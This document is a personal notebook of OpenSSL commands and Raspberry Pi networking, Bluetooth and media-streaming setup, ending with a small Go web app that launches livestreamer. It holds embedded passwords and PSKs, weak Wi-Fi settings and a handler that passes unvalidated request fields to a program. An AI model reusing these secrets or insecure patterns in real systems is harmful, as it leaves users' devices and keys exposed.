echo -n test | openssl rsautl -encrypt -pubin -inkey key-pub.pem | xxd -p | xxd -r -p |openssl rsautl -decrypt -inkey key.pem => test

Java: https://javadigest.wordpress.com/2012/08/26/rsa-encryption-example/

Sign/Verify

Generate key, publicKey

1
2
openssl genrsa -out key.pem
openssl rsa -in key.pem -pubout > key-pub.pem

Sign/Verify a file with openssl dgst

1
2
openssl dgst -sha256 -sign key.pem -out pass.sign pass.txt
openssl dgst -sha256 -verify key-pub.pem -signature pass.sign pass.txt

Sign/Verify a file with openssl rsautl

1
2
3
openssl rsautl -sign -inkey key.pem -out pass.rsa -in pass.txt
openssl rsautl -verify -inkey key-pub.pem -in pass.rsa -pubin
openssl rsautl -verify -inkey key-pub.pem -in pass.sign -pubin

GPG

Convert keys between GnuPG, OpenSsh and OpenSSL
http://sysmic.org/dotclear/index.php?post/2010/03/24/Convert-keys-betweens-GnuPG%2C-OpenSsh-and-OpenSSL

Other openssl command

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
ssh public key stored in .ssh folder: 
ssh-keygen -f koding -y > koding_id_rsa.pub (openssl genrsa -out key.pem)

show public key from the private key
openssl rsa -in koding -pubout > koding-pub.pem

show -modulus from the private key
openssl rsa -in key.pem -noout -modulus

p12 file (usually with .pfx extension) contains certificate, public key, private key
openssl x509 - for certificate
openssl x509 -inform der -in certificate.cer -out certificate.pem (with -pubkey -noout to print public key only)

openssl pkcs12 - for p12 file
openssl pkcs12 -in certificate.pfx -out certificate.cer -nodes -passin pass:"3228474250821687" | openssl x509 -noout -subject
keytool -list -v -keystore P_DS_WONGTWOMANA1136227_Valid785781e3_123.p12 -storepass 123 -storetype pkcs12

openssl rsa - for private key
openssl rsa -in koding -out koding2 (Remove a passphrase from a private key)

openssl req - for private key and csr related
openssl req -out koding.csr -key koding -new


scratch domain csr
openssl req -new -sha256 -key scratch.key -subj "/CN=www.scratch.hk" > scratch.csr
openssl req -new -sha256 -key scratch.key -subj "/" -reqexts SAN -config <(cat /etc/ssl/openssl.cnf <(printf "[SAN]\nsubjectAltName=DNS:scratch.hk,DNS:www.scratch.hk")) > scratch.csr

protocal: ssh, ssl
symmetric cryptographic algorithm : aes, des, 3des
asymmetric cryptographic algorithm: rsa, dsa
hash : crc32, md5, sha1, sha256, sha512
aes/des加密速度快,适合大量数据,des容易破解,一般用3重des,后来又出现了更快更安全的aes
rsa是公钥加密,速度慢,只能处理少量数据,优点是公钥即使在不安全的网络上公开,也能保证安全
常见情况是双方用rsa协商出一个密钥后通过aes/3des给数据加密

=========
Using a car analogy:

PGP is a car
OpenPGP is the design for the PGP car
GnuPG is another car using the same design
RSA is a diesel engine, and other engines are available
SSH isn't a car at all. But it uses engines.

https://program-think.blogspot.com/2010/06/howto-prevent-hacker-attack-3.html

Golang

encoding/json, csv, xml, hex, base64
crypto/aes, des, rsa, dsa, md5, sha1, sha256, sha512, x509

New command to learn

tr, xxd

Move To Anthor Tablespace

– ALTER TABLESPACE PRLS_DATA OFFLINE NORMAL;

select ‘ALTER TABLE ‘ || OWNER || ‘.’ || TABLE_NAME || ‘ MOVE TABLESPACE ‘ || ‘DESTINATION_TABLESPACE’ || ‘;’ from DBA_TABLES WHERE OWNER = ‘XX’;

select ‘ALTER INDEX ‘ || OWNER || ‘.’ || INDEX_NAME || ‘ REBUILD TABLESPACE ‘ || ‘DESTINATION_TABLESPACE’ || ‘;’ from DBA_INDEXES WHERE OWNER = ‘XX’;

– ALTER TABLESPACE PRLS_DATA ONLINE;

Change default tablespace
alter user xx
default tablespace DESTINATION_TABLESPACE;

Cross Compile Go File

sudo apt-get install gcc-arm-linux-gnueabihf

sudo apt-get install gcc-multilib g++-multilib Fix “fatal error: ‘sys/cdefs.h’ file not found # include <sys/cdefs.h>

sudo apt-get install linux-headers-generic Fix “fatal error: asm/errno.h: No such file or directory”

1
2
3
4
5
CC=arm-linux-gnueabihf-gcc GOOS=linux GOARCH=arm GOARM=6 CGO_ENABLED=1 GOPATH=/opt/software/SimpleComputerRemote/Host GOROOT=/opt/software/go1.7 /opt/software/go1.7/bin/go env

CC=arm-linux-gnueabihf-gcc GOOS=linux GOARCH=arm GOARM=6 CGO_ENABLED=1 GOPATH=/opt/software/SimpleComputerRemote/Host GOROOT=/opt/software/go1.7 /opt/software/go1.7/bin/go build -o bin/server-linux-arm.out -ldflags="-s -w" src/Rekap\ Remote\ Server.go

CC=arm-linux-gnueabihf-gcc GOOS=linux GOARCH=arm GOARM=6 CGO_ENABLED=1 GOPATH=/opt/software/SimpleComputerRemote/Host GOROOT=/opt/software/go1.5 /opt/software/go1.5/bin/go build -o bin/server-linux-arm.out -ldflags="-s -w" src/Rekap\ Remote\ Server.go

At the end, but fail to cross compile the SimpleComputerRemote project, so this article is just for reference.

Reference
http://linux-sunxi.org/Toolchain
[進階] 安裝 Raspberry Pi 的 Toolchain
http://www.veryarm.com/296.html
arm交叉編譯器gnueabi、none-eabi、arm-eabi、gnueabihf、gnueabi區別

Setup Minidlna omxplayer bluetooth on RPi

Install minidlna by sudo apt-get install minidlna

Changes in /etc/minidlna.conf

1
2
media_dir=/home/pi/minidlna
db_dir=/var/lib/minidlna (allow minidlna to index files)

Restart minidlna,

  1. sudo systemctl restart minidlna
  2. sudo service minidlna start
  3. sudo /etc/init.d/minidlna start
  4. sudo service minidlna status -l
  5. sudo systemctl status minidlna -l

http://mkitby.com/2015/11/09/raspberry-pi-nas-upnp-dlna/
http://cheng-min-i-taiwan.blogspot.hk/2013/02/raspberry-pi-dlna.html

Install the command line media player by sudo apt-get install omxplayer, then play the music from ssh command line.

Control the playback via such app “OMX Remote” or “Raspicast” which can be download from google play.

https://codeyarns.com/2016/09/09/how-to-cast-to-raspberry-pi-using-raspicast/
https://codeyarns.com/2016/03/20/omxplayer/
https://codeyarns.com/2016/09/09/omx-remote/

Connect to bluetooth speaker

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
hcitool dev
hciconfig - show BD address of Pi
hciconfig -a hci0
rfkill unblock bluetooth or rfkill unblock all // If bluetoothctl cannot find any controller, the bluetooth device may be blocked. Try to unblock it using rfkill
sudo bluetoothctl
# scan on (find the BD address)
# scan off
# agent on
# default-agent
# pair A0:E4:53:20:77:79
# trust A0:E4:53:20:77:79
# connect A0:E4:53:20:77:79
# list
# devices
# show
# disconnect A0:E4:53:20:77:79

Play music with the bluetooth speaker(Phillips BT3000) using A2DP profile

  1. Check if pulseaudio is running (Reference https://wiki.archlinux.org/index.php/PulseAudio_(%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87))

    1
    2
    3
    4
    5
    ps aux | grep pulseaudio
    =>
    /usr/bin/start-pulseaudio-X11
    pulseaudio --start
    (PulseAudio would run along with X11 desktop startup)
  2. List the sound cards pacmd list-cards. Test audio output of left and right channal speaker-test -c 2

  3. List the audio output pacmd list-sinks or pactl list sinks short. Check the default audio sink aplay -L

  4. List the audio input pacmd list-sources or pactl list sources short

  5. Set the Bluetooth speaker becomes default sink pacmd set-default-sink 1 (index 1 is like bluez_sink.xx_xx_xx_xx_xx_xx)

  6. Turn up the PulseAudio volume pacmd set-sink-volume 0 65537 Or turn up the ALSA volume amixer set Master 100% or amixer cset numid=3 100%
    Reference:
    http://youness.net/raspberry-pi/bluetooth-headset-raspberry-pi
    http://www.crazy-audio.com/2014/09/pulseaudio-on-the-raspbery-pi/

  7. Show soundcard information aplay -L or aplay -l, play a music aplay -v -V stereo HANA.mp3

Stream music to RPi from mobile phone connecting with bluetooth (Optional, maybe RPi can automatically detect the audio source (bluetooth) and sink(3.5mm audio jack)

pactl load-module module-loopback source=bluez_source.B8_C6_8E_52_E8_CA sink=alsa_output.platform-bcm2835_AUD0.0.analog-stereo
Reference:
http://kmonkey711.blogspot.hk/2012/12/a2dp-audio-on-raspberry-pi.html
http://www.dreamincode.net/forums/blog/62/entry-4272-sound-on-an-arch-linux-arm-raspberry-pi/

Bluetooth stack

Controller stack
HCI(Host Controller Interface)
Protocol stack
- L2CAP (Logical Link Control and Adaptation Protocol) -
- SDP (Service Discovery protocol) - scan devices
- RFCOMM (Radio frequency communication) - on top of L2CAP, providing emulated RS-232 serial ports
- BNEP (Bluetooth network encapsulation protocol) - on top of L2CAP, for personal area networking (PAN) profile
Profiles
- A2DP (Advanced Audio Distribution Profile) - for headset
- DUN (Dial-up Networking Profile) - for accessing internet by dialing up on a modem
https://en.wikipedia.org/wiki/List_of_Bluetooth_protocols
https://en.wikipedia.org/wiki/List_of_Bluetooth_profiles

Setup PAN

  1. Install bridge-utils sudo apt install bridge-utils

  2. Install python-dbus sudo apt install python-dbus

  3. Download bt-pan script wget https://raw.githubusercontent.com/mk-fg/fgtk/master/bt-pan

  4. Setup bpen bridge

    1
    2
    3
    4
    5
    6
    7
    sdptool add NAP # advertise NAP service, but found sdptool does not work in bluez 5
    brctl show bnep
    sudo brctl addbr bnep
    sudo brctl setfd bnep 0
    sudo brctl stp bnep off
    sudo ip addr add 192.168.12.3/24 dev bnep
    sudo ip link set bnep up
  5. Setup server via dbus

    1
    2
    dbus-send --system --dest=org.bluez --print-reply --type=method_call /org/bluez/hci0 org.bluez.NetworkServer1.Unregister string:'nap'
    dbus-send --system --dest=org.bluez --print-reply --type=method_call /org/bluez/hci0 org.bluez.NetworkServer1.Register string:'nap' string:'bnep'

    Reference

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    dbus-send --system --type=method_call --print-reply --dest=org.bluez /org/bluez org.freedesktop.DBus.Introspectable.Introspect
    dbus-send --system --dest=org.bluez --type=method_call --print-reply /org/bluez/hci0 org.freedesktop.DBus.Introspectable.Introspect
    dbus-send --system --type=method_call --print-reply=literal --dest=org.bluez /org/bluez/hci0 org.freedesktop.DBus.Properties.Set string:org.bluez.Adapter1 string:Powered variant:boolean:false
    dbus-send --system --type=method_call --print-reply --dest=org.bluez /org/bluez/hci0 org.freedesktop.DBus.Properties.Get string:org.bluez.Adapter1 string:Address
    dbus-send --system --type=method_call --print-reply --dest=org.freedesktop.DBus / org.freedesktop.DBus.ListNames

    //below script is from http://rrbluetoothx.blogspot.hk/2016/06/rr-bluetooth-list-dbus-services-buses.html
    dbus-send --system \
    --dest=org.freedesktop.DBus \
    --type=method_call \
    --print-reply \
    /org/freedesktop/DBus \
    org.freedesktop.DBus.ListNames

    //below script is from https://gist.github.com/studiofuga/5262efb95968b02a365d
    * Making an adapter discoverable (check that rfkill is enabled, otherwise /org/bluez/hci0 will not be available)
    dbus-send --system --dest=org.bluez --print-reply /org/bluez/hci0 \
    org.freedesktop.DBus.Properties.Set \
    string:org.bluez.Adapter1 string:Discoverable variant:boolean:true

    * Changing the discoverable timeout. Default is 180s.

    dbus-send --system --dest=org.bluez --print-reply /org/bluez/hci0 \
    org.freedesktop.DBus.Properties.Set \
    string:org.bluez.Adapter1 string:DiscoverableTimeout variant:uint32:0

    Or Run bt server ./bt-pan --debug server bnep

  6. Run bt client ./bt-pan --debug client 00:11:67:55:8F:69
    https://blind.guru/tag/bluetooth-pan.html
    http://blog.fraggod.net/2015/03/28/bluetooth-pan-network-setup-with-bluez-5x.html (provide the bt-pan script)
    http://www.agouros.de/Elwood/Bluetooth.html
    http://trac.gateworks.com/wiki/wireless/bluetooth (very detail)
    http://wiki.openmoko.org/wiki/Manually_using_Bluetooth#Bluetooth_networking_with_a_Linux_system_-_More_secure_way

sshfs

  1. Install sshfs sudo apt-get install sshfs
  2. Mount the directory by
    1
    2
    3
    sshfs -o allow_other -o kernel_cache -o auto_cache -o reconnect \
    -o compression=no -o cache_timeout=600 -o ServerAliveInterval=15 \
    support@192.168.42.1:/tmp/song /home/pi/minidlna
  3. Refresh the list to load new songs from sshfs directory by minidlnad -R
  4. Reload minidlna service sudo service minidlna force-reload
  5. Unmount directory fusermount -u ~/minidlna

tinyproxy and iptables

1
2
sudo apt-get install tinyproxy
sudo service tinyproxy start

After install tinyproxy in my chromebook, found RPi cannot connect to 8888 port of tinyproxy(nc -l 8888 in chromebook and fail to connect by nc 192.168.42.9 8888 in RPi), which is caused by iptables rule. Then add it,

  1. Save the rules sudo iptables-save > iptables.rules
  2. Add the rule for proxy working sudo iptables -A INPUT -s 192.168.42.0/24 -i wlan0 -p tcp -dport 8888 -j ACCEPT
  3. Restore the rules sudo iptables-restore < iptables.rules

mpg321, mpg123, speedtest-cli (just mark this, this is nothing)

Check the release or other useful information

1
2
3
4
5
6
7
8
9
10
lsb_release -a
vcgencmd version

cat /etc/os-release
cat /etc/rpi-issue
cat /etc/debian_version

cat /proc/cpuinfo
cat /proc/meminfo
cat /proc/version

Show various hardware information to RPi

1
2
3
4
5
6
7
8
9
vcgencmd commands

vcgencmd measure_clock arm
vcgencmd measure_clock core

vcgencmd get_config int

vcgencmd get_mem arm
vcgencmd get_mem gpu

Setup Display On Rpi

Xorg Display Server

1
2
sudo apt-get install --no-install-recommends xserver-xorg
sudo apt-get install --no-install-recommends xinit (for command *startx* to start the Xorg Display Server)

Desktop Environment and Openbox Window Manager

1
2
sudo apt-get install lxde-core
sudo apt-get install lxappearance (Optional, for changing the look of applications such as panels, icons, progress bars, cursors, and so on, give yourself more customization abilities)

Login Manager

sudo apt-get install lightdm
if no login manager was installed, then just login via the command line! At anytime, you can launch the Xorg Display Server by typing in:
startx

Ubuntu <=> RPi

tightvncserver

Install tightvncserver sudo apt-get install tightvncserver (For RPi to install tightvncserver, it needs to install xfonts-base)
Fix gray screen when login to ubuntu 14.04. Update file /.vnc/xstartup as below

1
2
3
4
5
6
7
8
9
10
11
#!/bin/sh
def
export XKL_XMODMAP_DISABLE=1
unset SESSION_MANAGER
unset DBUS_SESSION_BUS_ADDRESS

gnome-panel &
gnome-settings-daemon &
metacity &
nautilus &
gnome-terminal &
  1. Start vnc server by tightvncserver or with more options vncserver :0 -geometry 1920x1080 -depth 24
    tightvncserver == vncserver
  2. Stop vnc server by tightvncserver -kill :1
    3 .Download tvnjviewer-2.8.3-bin-gnugpl and connect to vnc server by java -jar tightvnc-jviewer.jar

x2x

On RPi

  1. sudo apt-get install x2x
  2. make sure X11Forwarding yes in /etc/ssh/sshd_config
    On Workstation
  3. ssh -X pi@192.168.42.100 x2x -west -to :0 (-west, -north, -south) (-to :X <= echo $DISPLAY on RPi)

Another option xdotool

DISPLAY=:0 xdotool getactivewindow key Down
DISPLAY=:0 xdotool getactivewindow type 'your text here'

1
2
3
xdotool click 1` 按下滑鼠左鍵(左鍵:1、滾輪:2、右鍵:3、滾輪上/下:4/5
xdotool mousedown
xdotool mouseup

Android <=> RPi

  1. Install simplecomputerremote on RPi

    1
    2
    3
    # wget http://philproctor.github.io/SimpleComputerRemote/downloads/simplecomputerremote_1.2_armhf.deb
    # sudo dpkg -i simplecomputerremote_1.2_armhf.deb
    # /opt/rekap/SimpleComputerRemote
  2. Configure simplecomputerremote to run after desktop environment startup

    1
    2
    3
    mkdir /home/pi/.config/autostart (if the directory does not exist.)
    cd /home/pi/.config/autostart
    sudo nano SimpleComputerRemote.desktop

    Add following line in SimpleComputerRemote.desktop file

    1
    2
    3
    4
    5
    6
    7
    [Desktop Entry]
    name=SimpleComputerRemote
    GenericName=Remote Control
    Comment=Allow remote control using Simple Computer Remote
    Exec=/opt/rekap/SimpleComputerRemote
    Terminal=False
    Type=Application
  3. As the app no longer exists in Google Play, you should need to download the apk from other market and install com.rekap.remote.apk on Android. Open the app, go to “Settings > Select Server” and you will see RPi on the list.

Reference

Display
https://www.raspberrypi.org/forums/viewtopic.php?f=66&t=133691

x2x
http://raspberrypi.stackexchange.com/questions/4253/forward-mouse-and-keyboard-input-to-x-session
http://linuxcommando.blogspot.hk/2014/07/share-keyboard-and-mouse-on-two-x.html
https://help.ubuntu.com/community/X2xHowto
https://github.com/dottedmag/x2x

Simple Computer Remote
https://www.raspberrypi.org/forums/viewtopic.php?f=27&t=40797
http://sanjosetech.blogspot.hk/2013/10/raspberry-pi-remote-control.html
http://randomcompstuff.blogspot.hk/2014/07/how-to-install-simple-computer-remote.html
Fix grey screen on connecting VNC server when setting up Ubuntu 14.04 with VNC
quadcopter control by RPi

Install Hostapd On Rpi

List all enabled services.

systemctl list-unit-files | grep enabled

List all running services.

systemctl | grep running

Get sshd to start on boot as it is disabled by default

sudo systemctl enable ssh.socket

Get dhcpd to stop on boot as it need more time to boot

sudo systemctl disable dhcpcd.service

Install hostapd

1
2
3
4
git clone https://github.com/lostincynicism/hostapd-rtl8188
sudo apt-get install libnl-3-dev # Fix fatal-error-netlink-genl-genl-h-no-such-file-or-directory
sudo apt-get install libnl-genl-3-dev
cd hostapd-rtl8188/hostapd && sudo make all

Add following lines to /boot/my-hostapd.sh file

1
2
3
4
5
6
#!/bin/sh -
#ifconfig wlan0 192.168.42.100 up
#sleep 0.5
#wpa_cli -i wlan0 terminate # Stop wpa_supplicant process
#sleep 0.5
/home/pi/hostapd-rtl8188/hostapd/hostapd /boot/hostadp.8188eu.conf

For ip configuration, it is more applicable to update /etc/network/interfaces file, but for Jessie Debian, it needs to disable dhcpd first refering to http://raspberrypi.stackexchange.com/questions/37920/how-do-i-set-up-networking-wifi-static-ip-address and https://www.raspberrypi.org/documentation/hardware/raspberrypi/bootmodes/net_tutorial.md

1
2
sudo systemctl disable dhcpcd
sudo systemctl enable networking
1
2
3
4
5
6
7
8
9
10
11
12
13
14
auto lo

iface lo inet loopback
iface eth0 inet dhcp

allow-hotplug wlan0
iface wlan0 inet static
address 192.168.42.100
netmask 255.255.255.0

#allow-hotplug wlan0
#iface wlan0 inet manual
#wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
#iface default inet dhcp

Settings in /boot/hostadp.8188eu.conf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
interface=wlan0
driver=rtl871xdrv
ssid=RasPi-AP
hw_mode=g
channel=1
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=1
wpa_pairwise=CCMP
#wpa=2
#rsn_pairwise=TKIP CCMP
wpa_passphrase=123456789
wpa_key_mgmt=WPA-PSK

Settings in /lib/systemd/system/hostapd.service as below

1
2
3
4
5
6
7
8
9
10
[Unit]
Description=My Hostapd Service
After=multi-user.target

[Service]
Type=idle
ExecStart=/boot/my-hostapd.sh

[Install]
WantedBy=multi-user.target
1
2
3
sudo chmod 644 /lib/systemd/system/hostapd.service
sudo systemctl daemon-reload # 重载所有修改过的配置文件
sudo systemctl enable hostapd.service

Check the hostapd.service

sudo systemctl status hostapd.service

Start/Stop/Restart the hostapd.service

1
2
3
sudo systemctl start hostapd.service
sudo systemctl stop hostapd.service
sudo systemctl restart hostapd.service

Run tmux in Ubuntu

options in /etc/wpa_supplicant/wpa_supplicant.conf

1
2
3
4
5
6
7
ctrl_interface=/var/run/wpa_supplicant
update_config=1

network={
ssid="RasPi-AP"
psk="iplababab1411"
}

Notes

  1. In one pane, run sudo wpa_supplicant -Dnl80211,wext -iwlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf
    The option of ‘wext’ is the 8188eu driver for wpa_supplicant
  2. In other pane, run sudo wpa_cli or sudo iwlist wlan0 scan
  3. iw command for “nl80211”, iwconfig/iwlist(wireless_tools) for “wext” (rtl871xdrv)
  4. wpa_supplicant - works with both wext and nl80211.
    1
    2
    3
    iwconfig wlan0 => iw dev wlan0 link (Getting info on wlan0)
    iwconfig wlan0 essid foo => iw wlan0 connect foo (Connecting to an open network)
    iwconfig wlan0 essid off => iw wlan0 ibss leave (Leave an IBSS (ad-hoc network))

Install udhcpd

  1. sudo apt-get install udhcpd

  2. Settings in /etc/udhcpd.conf

    1
    2
    3
    4
    5
    6
    7
    8
    9
    start 192.168.42.2 # This is the range of IPs that the hostspot will give to client devices.
    end 192.168.42.20
    interface wlan0 # The device uDHCP listens on.
    max_leases 10
    remaining yes
    opt dns 8.8.8.8 4.2.2.2 # The DNS servers client devices will use.
    opt subnet 255.255.255.0
    opt router 192.168.42.100 # The Pi's IP address on wlan0 which we will set up shortly.
    opt lease 864000 # 10 day DHCP lease time in seconds
  3. Enable dhcpd #DHCPD_ENABLED="no" in /etc/default/udhcpd

  4. Start service

    1
    2
    sudo systemctl restart hostapd.service
    sudo service udhcpd restart
  5. Check result
    service udhcpd status Or
    cat /var/log/syslog | grep udhcpd

  6. Get the udhcpd to start on boot
    sudo update-rc.d udhcpd enable

Reference
http://www.raspberrypi-spy.co.uk/2015/10/how-to-autorun-a-python-script-on-boot-using-systemd/
https://wiki.archlinux.org/index.php/WPA_supplicant
https://wiki.archlinux.org/index.php/Wireless_network_configuration
http://elinux.org/RPI-Wireless-Hotspot

Create SoftAP with Hostapd on Ubuntu and Rpi.md

In Ubuntu 14.04

Check whether the module 8188eu is load lsmod|grep 8188 or lsusb

Download and compile latest hostapd with RTL8188 drivers

1
2
3
4
git clone https://github.com/lostincynicism/hostapd-rtl8188
sudo apt-get install libnl-3-dev # Fix fatal-error-netlink-genl-genl-h-no-such-file-or-directory
sudo apt-get install libnl-genl-3-dev
cd hostapd-rtl8188/hostapd && sudo make all

The complete options in /usr/share/doc/hostapd/examples/hostadp.8188eu.conf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
interface=wlan0
driver=rtl871xdrv
ssid=Soft-AP
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
#wpa=1
#wpa_pairwise=CCMP
wpa=2
rsn_pairwise=TKIP CCMP
wpa_passphrase=123456789
wpa_key_mgmt=WPA-PSK

Fix “Cannot find the ssid problem”

1
2
sudo nmcli nm wifi off
sudo rfkill unblock wlan # disable power saving mode, use **sudo nmcli radio wifi off** if Error: Object 'nm' is unknown then use this instead:

Following maybe not work but for reference

1
2
3
4
5
6
7
sudo systemctl disable NetworkManager.service 
sudo systemctl enable networking.service

sudo systemctl status wpa_supplicant.service

sudo systemctl --force stop wpa_supplicant.service
wpa_cli -i wlan0 terminate # stop wpa_supplicant program as it is conflicted with hostapd

Start hostapd

1
2
3
cd hostapd-rtl8188/hostapd
sudo ./hostapd -dd /usr/share/doc/hostapd/examples/hostadp.8188eu.conf
sudo ifconfig wlan0 192.168.42.1

In Raspberry Pi

Configure IP sudo ifconfig wlan0 192.168.42.100

Scan ssid iwlist wlan0 scan

Connect to ssid “Soft-AP”

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# wpa_cli
>scan
>scan_results
>add_network
>set_network 0 ssid "Soft-AP"
>set_network 0 psk "123456789"
>enable_network 0
>quit
# ping 192.168.42.1 or iwconfig


wpa_cli -i wlan0 terminate (關閉wpa_supplicant)
wpa_cli -i wlan0 save_config (儲存寫入到wpa_supplicant.conf中,否責變更無效) need "update_config=1" in /etc/wpa_supplicant/wpa_supplicant.conf
wpa_cli -i wlan0 select_network (選擇不同的AP,id為AP代號0,1,2,3...)
wpa_cli -i wlan0 disable_network
wpa_cli -i wlan0 remove_network (刪除AP資訊)
wpa_cli -i wlan0 disconnect (斷線)
wpa_cli -i wlan0 reconnect (重新連線)
wpa_cli -i wlan0 list_networks (查看wpa_supplicant.conf檔裡的設定)
wpa_cli -i wlan0 interface (查看有那些無線網卡介面)

Others

In Ubuntu

  • Set proxy java -cp lib/log4j-1.2.16.jar:lib/jboss-common-logging-spi.jar:lib/netty.jar org.jboss.netty.example.proxy.HexDumpProxy 8081 10.13.135.115 8080

In RaspPi

  • Setting Up apt-get with proxy. Add file proxy.conf in “/etc/apt/“ with content Acquire::http::Proxy "http://192.168.42.1:8081/";
  • Setting Up http proxy by
    1
    2
    export http_proxy=http://192.168.42.1:8081/
    export https_proxy=http://192.168.42.1:8081/
  • Run sudo apt-get install apt-transport-https if problem “E: The method driver /usr/lib/apt/methods/https could not be found.” occurs when sudo apt-get update
  • Install mpv from https://nwgat.ninja/quick-easy-compiling-mpv-for-raspberry-pi/
  • Install livestreamer
  1. Download setuptools from https://pypi.python.org/pypi/setuptools#downloads
  2. Install setuptools python setup.py install and sudo -E easy_install livestreamer
  3. Test the audio livestreamer --https-proxy=http://192.168.42.1:8081 --http-proxy=http://192.168.42.1:8081 hlsvariant://http://rthkaudio1-lh.akamaihd.net/i/radio1_1@355864/master.m3u8 best -p mpv
  4. Change the volumn by
    4.1 amixer controls to show the Master Playback Volume
    4.2 Get details of the master playback volume control by amixer cget numid=3, it shows a pair of volume values=65536,65536(for left and right channels)
    alsamixer, save volumn level via sudo alsactl store
    amixer cset numid=1 -- 80% or amixer cset numid=3 80% Or amixer set Master 100%
    4.3 To mute the sound by amixer cset numid=4 off (Control 4), this also affects the volume values on control 3
    Reference http://blog.scphillips.com/posts/2013/01/sound-configuration-on-raspberry-pi-with-alsa/
  5. Set audio output device amixer cset numid=3 N (N=0=auto, 1=analog, 2=hdmi)
  • Start openssh-server sudo service ssh start
  • Install openvpn sudo apt-get install openvpn
  • Install adb and fastboot by sudo apt-get install android-tools-adb android-tools-fastboot
  • Configure udev service for detecting the pluged phone
    1
    2
    3
    sudo wget -O /etc/udev/rules.d/51-android.rules https://raw.githubusercontent.com/NicolasBernaerts/ubuntu-scripts/master/android/51-android.rules
    sudo chmod a+r /etc/udev/rules.d/51-android.rules
    sudo service udev restart
  • Plug the mobile and mount the sdcard by sudo mount /dev/sda1 /mnt
    Check the disk by
    1
    2
    3
    sudo fdisk -l /dev/sda
    sudo lsblk
    df -h
  • USB tethering
    1
    2
    adb forward tcp:41927 tcp:41927
    sudo openvpn azilink.ovpn
  1. Write PiCast application with golang
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    package main

    import (
    "fmt"
    "github.com/gorilla/mux"
    "io/ioutil"
    "net/http"
    "os"
    "os/exec"
    "strings"
    "syscall"
    )

    func main() {
    r := mux.NewRouter()
    r.HandleFunc("/", Home)
    //r.HandleFunc("/yt-stream/{args}", Youtube)
    r.HandleFunc("/yt-stream", Youtube)

    bind := fmt.Sprintf("%s:%s", os.Getenv("HOST"), os.Getenv("PORT"))
    fmt.Printf("listening on %s...\n", bind)
    err := http.ListenAndServe(bind, r)
    if err != nil {
    panic(err)
    }
    }

    func Home(res http.ResponseWriter, req *http.Request) {
    fmt.Fprint(res, "Welcome to PiCAST! In the URL, type what you want to do...\n")
    }

    func Youtube(res http.ResponseWriter, req *http.Request) {
    body := readReqBody(req)
    url := body["url"]

    if url == "" {
    args := body["args"]
    url = "https://www.youtube.com/watch?v=" + args
    }

    p := body["proxy"]

    http_proxy := ""
    https_proxy := ""

    if p != "" {
    http_proxy = "--https-proxy=" + p
    https_proxy = "--http-proxy=" + p
    }

    args := []string{http_proxy, https_proxy, url, "best", "--player=mpv"}
    fmt.Println(args)

    run(args)
    }

    func run(args []string) {
    exec.Command("killall livestreamer").Run()

    binary, lookErr := exec.LookPath("livestreamer")
    if lookErr != nil {
    panic(lookErr)
    }

    env := os.Environ()

    execErr := syscall.Exec(binary, args, env)
    if execErr != nil {
    fmt.Println("execErr", execErr)
    }
    }

    func runOld(args []string) {
    cmd := exec.Command("livestreamer", args...)
    fmt.Println(cmd.Path)
    fmt.Println(cmd.Args)
    fmt.Println(cmd.Env)

    if err := cmd.Start(); err != nil {
    fmt.Printf("cmd.Start: %v\n", err)
    }

    if err := cmd.Wait(); err != nil {
    if exiterr, ok := err.(*exec.ExitError); ok {
    if status, ok := exiterr.Sys().(syscall.WaitStatus); ok {
    fmt.Printf("Exit Status: %d\n", status.ExitStatus())
    }
    } else {
    fmt.Printf("cmd.Wait: %v\n", err)
    }
    }
    }

    func readReqBody(req *http.Request) map[string]string {
    body, _ := ioutil.ReadAll(req.Body)
    // Info.Println("body = ", string(body))
    m := make(map[string]string)

    content := strings.Split(string(body), "&")
    for _, c := range content {
    p := strings.Split(c, "=")
    if len(p) == 2 {
    m[p[0]] = p[1]
    }
    }
    return m
    }
  • Cross compile this web application in linux

    1
    2
    env GOOS=linux GOARCH=arm go build -ldflags="-s -w" main.go
    scp -i id_rsa main pi@192.168.42.100:/home/pi/
  • Install tmux on ubuntu
    sudo apt-get install tmux

    ctrl+b % - split window vertically
    ctrl+b " - split window horizontally
    ctrl+b o - Goto next pane
    ctrl+b c - Create new window
    ctrl+b w - List all windows 
    ctrl+b l - Move to the previously selected window
    

Reference

ADB FIFO example
USB tethering
https://github.com/lanceseidman/PiCAST

Play audio/video using livestreamer

Play stream

City_Snapshot from rthk

livestreamer --https-proxy=http://proxy1.scig.gov.hk:8080 --http-proxy=http://proxy1.scig.gov.hk:8080 hlsvariant://http://stmw.rthk.hk/aod/_definst_/radio/archive/radio1/City_Snapshot/mp3/mp3:20161129.mp3/playlist.m3u8 best -p "C:\Program Files\VideoLAN\VLC\vlc.exe" --verbose-player --stream-types=hls

RTHK Radio 1

livestreamer --https-proxy=http://proxy1.scig.gov.hk:8080 --http-proxy=http://proxy1.scig.gov.hk:8080 hlsvariant://http://rthkaudio1-lh.akamaihd.net/i/radio1_1@355864/master.m3u8 best -p C:\Users\User\Downloads\mpv-x86_64-20170102-git-8e41f31\mpv.exe

RTHK Radio 2

